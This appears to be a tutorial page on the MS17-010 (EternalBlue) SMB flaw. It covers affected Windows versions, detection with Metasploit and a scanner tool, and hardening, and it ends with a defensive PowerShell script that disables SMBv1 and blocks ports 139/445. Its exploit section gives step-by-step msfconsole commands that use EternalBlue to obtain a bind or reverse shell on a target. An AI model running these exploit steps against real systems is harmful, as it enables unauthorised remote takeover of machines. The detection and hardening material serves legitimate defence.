Vulnerability description
An attacker sends specially crafted messages to the Microsoft Server Message Block (SMB) server. The most severe of the vulnerabilities could allow remote code execution.
Affected versions
- Windows Vista
- Windows 7
- Windows 8.1
- Windows RT 8.1
- Windows 10
- Windows Server 2008 and Windows Server 2008 R2
- Windows Server 2012 and Windows Server 2012 R2
- Windows Server 2016
…
Vulnerability detection
Using Metasploit:
# start msf
msfconsole
search ms17-010
use auxiliary/scanner/smb/smb_ms17_010
# set the target ip
set rhosts 192.168.234.132
run
If the output shows "Host is likely VULNERABLE to MS17-010", the vulnerability is present.
Using Windows:
Use the tool:
https://github.com/holmesian/ms17_010_scan
Single-ip detection:
#ms17010scan-h-n-amd64-1.exe -h ip
ms17010scan-h-n-amd64-1.exe -h 192.168.234.132
Multi-ip scanning:
#ms17010scan-h-n-amd64-1.exe -n ip/24
ms17010scan-h-n-amd64-1.exe -n 192.168.234.0/24
Exploit
Using Metasploit:
# start msf
msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
# set the target ip
set rhosts 192.168.234.132
run
Receiving the shell without a public ip
If you only have a PC and no public ip address on which to receive the shell returned by the exploit, you only need to change the MSF payload.
# list the available payloads
show payloads
# change the payload to generic/shell_bind_tcp
set payload 1
# view the configuration; we only need to set the following
show options
# set the target ip
set rhost 192.168.234.134
set lport 5555
run
My understanding is that the generic/shell_bind_tcp payload opens port 5555 on the target machine, and we actively connect to it to get the shell.
The original windows/x64/meterpreter/reverse_tcp instead makes the other party actively connect to the port we are listening on.
Vulnerability hardening
1. Install the operating system patch.
2. Close unnecessary ports such as 139 and 445 on the operating system.
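The following PowerShell script is an added example, not part of the original page or of the ms17_010_scan project. It audits a Windows host for the two hardening steps above and applies them: it checks whether the MS17-010 update is installed, disables SMBv1 (the protocol version EternalBlue targets), and adds an inbound firewall rule blocking TCP 139 and 445 where file sharing is not required. It assumes an elevated session on Windows 8.1 / Server 2012 R2 or later, where Get-SmbServerConfiguration and the NetSecurity cmdlets are available; the $RequiredKBs list is a placeholder that must be filled with the MS17-010 update IDs for the host's OS from the Microsoft advisory.

```powershell
# Added example: audit and harden a host against MS17-010 exposure.
# Assumes an elevated PowerShell session on Windows 8.1 / Server 2012 R2 or later.
# $RequiredKBs is a placeholder; fill it from the MS17-010 advisory for this OS.
$RequiredKBs = @('KB-PLACEHOLDER-FOR-THIS-OS')

function Test-Ms17010Patch {
    # Returns $true if any of the required update IDs is installed.
    $installed = Get-HotFix | Select-Object -ExpandProperty HotFixID
    foreach ($kb in $RequiredKBs) {
        if ($installed -contains $kb) { return $true }
    }
    return $false
}

function Disable-Smb1IfEnabled {
    # EternalBlue targets SMBv1; disabling it removes the attack surface.
    $smb = Get-SmbServerConfiguration
    if ($smb.EnableSMB1Protocol) {
        Write-Warning "SMBv1 is enabled; disabling it"
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
        return $true
    }
    Write-Output "SMBv1 already disabled"
    return $false
}

function Block-InboundSmbPorts {
    # Hardening step 2: block inbound 139/445 with a named firewall rule (idempotent).
    $ruleName = 'Block inbound SMB (139,445)'
    if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $ruleName -Direction Inbound -Protocol TCP `
            -LocalPort 139,445 -Action Block | Out-Null
        Write-Output "Created firewall rule '$ruleName'"
    } else {
        Write-Output "Firewall rule '$ruleName' already present"
    }
}

# Step 1: patch status
if (Test-Ms17010Patch) {
    Write-Output "MS17-010 update present"
} else {
    Write-Warning "MS17-010 update NOT found; install the operating system patch"
}

# Step 2: reduce the SMB attack surface
Disable-Smb1IfEnabled | Out-Null
Block-InboundSmbPorts

# Verification: report anything still listening on the SMB ports
Get-NetTCPConnection -State Listen |
    Where-Object { $_.LocalPort -in 139,445 } |
    Select-Object LocalAddress, LocalPort
```

Run it once interactively to review the warnings, then from a scheduled task or configuration-management job to keep the state enforced; on hosts that legitimately serve file shares, keep the SMBv1 step but replace the blanket port block with a rule scoped to the subnets that need access.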